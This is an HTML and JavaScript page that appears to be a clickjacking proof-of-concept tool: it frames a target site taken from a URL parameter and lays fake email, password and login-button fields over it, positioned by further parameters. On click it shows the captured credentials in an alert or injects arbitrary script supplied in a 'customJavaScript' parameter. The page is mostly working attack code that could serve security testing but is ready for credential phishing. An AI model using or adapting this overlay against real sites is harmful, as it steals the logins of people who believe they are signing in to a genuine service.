<!DOCTYPE html>
<html lang="en">

<head>
    <script type="text/javascript" src="/resources/js/jquery-1.11.0.js"></script>


    <link rel="shortcut icon" type="image/x-icon"
          href="/resources/img/logo.ico">

    <script type="text/javascript">

        function getURLParameter(sParam) {

            var sPageURL = window.location.search.substring(1);
            var decoded = decodeURIComponent(sPageURL);
            var sURLVariables = decoded.split('&');

            for (var i = 0; i < sURLVariables.length; i++) {
                var sParameterName = sURLVariables[i].split('=');
                if (sParameterName[0] == sParam) {
                    return sParameterName[1];
                }
            }
        }

        $(document).ready(function () {


            var targetURL = getURLParameter('target');

            var userNameTop = getURLParameter('userNameTop');
            var userNameLeft = getURLParameter('userNameLeft');

            var passwordTop = getURLParameter('passwordTop');
            var passwordLeft = getURLParameter('passwordLeft');

            var buttonTop = getURLParameter('buttonTop');
            var buttonLeft = getURLParameter('buttonLeft');

            var passwordStyleParam = getURLParameter('passwordStyle');
            var usernameStyleParam = getURLParameter('usernameStyle');
            var buttonStyleParam = getURLParameter('buttonStyle');
            var customJavaScript = getURLParameter('customJavaScript');

//            <%--EMAIL--%>
//            var baseEmailStyle = 'outline:none; box-shadow:none;border: none !important;height: 20px;width: 325px;background-color:#f9f9f9;';
            var emailStyle = usernameStyleParam + 'position: absolute; z-index: 2; top: ' + userNameTop + 'px; left: ' + userNameLeft + 'px;';
            $('#inputMalEmail').attr('style', emailStyle);

//            <%--PASSWORD--%>
//            var basePasswordStyle = 'outline:none; box-shadow:none;border: none !important;height: 20px;width: 325px;background-color:#f9f9f9;';
            var passwordStyle = passwordStyleParam + 'position: absolute; z-index: 2; top: ' + passwordTop + 'px; left: ' + passwordLeft + 'px;';
            $('#inputMalPassword').attr('style', passwordStyle);

//            <%--BUTTON--%>
//            var baseButtonStyle = 'outline:none; box-shadow:none;border: none !important;width:83px;height: 30px;color: #666666;font-weight: bold;font-family:verdana,sans-serif;';
            var buttonStyle = buttonStyleParam + 'position: absolute; z-index: 2; top: ' + buttonTop + 'px; left: ' + buttonLeft + 'px;';
            $('#jacksButton').attr('style', buttonStyle);


//            <%--DEBUGGING--%>

//            var position = $('#inputMalEmail').offset();
//            console.log('Email left: ' + position.left);
//            console.log('Email top: ' + position.top);
//
//            var width = $('#inputMalEmail').width();
//            console.log('email: width: ' + width);
//
//            var height = $('#inputMalEmail').height();
//            console.log('email: height: ' + height);


            $("#targetIframe").attr('src', targetURL);

            $('#jacksButton').click(function () {

                if (customJavaScript.length>0) {
                    $('<script>').attr('type', 'text/javascript').text(customJavaScript).appendTo('head');
                }

                else
                {
                    var jacksEmail = $('#inputMalEmail').val();
                    var jacksPassword = $('#inputMalPassword').val();

                    console.log('Email: ' + jacksEmail);

                    alert('Hit the road Jack...\nEmail is: ' + jacksEmail + ' \nAND\n Password is: ' + jacksPassword);

                    location.reload();
                }


            });

        });
    </script>

</head>

<body style=" margin: 0px;padding: 0px; border: 0px;width: 100%;height: 100%;">


<input type="text"
       style=""
       autocomplete="off" class="" id="inputMalEmail" placeholder="">


<input type="password"
       style=""
       autocomplete="off" class="" id="inputMalPassword" placeholder="">

<button type="submit"
        style=""
        id="jacksButton">Login
</button>


<iframe id="targetIframe" scrolling="no" frameBorder="0"
        style="z-index: 1; position: relative;overflow: hidden;margin: 0; padding: 0;display: block"
        src="" width="100%"
        height="1000">
</iframe>

</body>

</html>
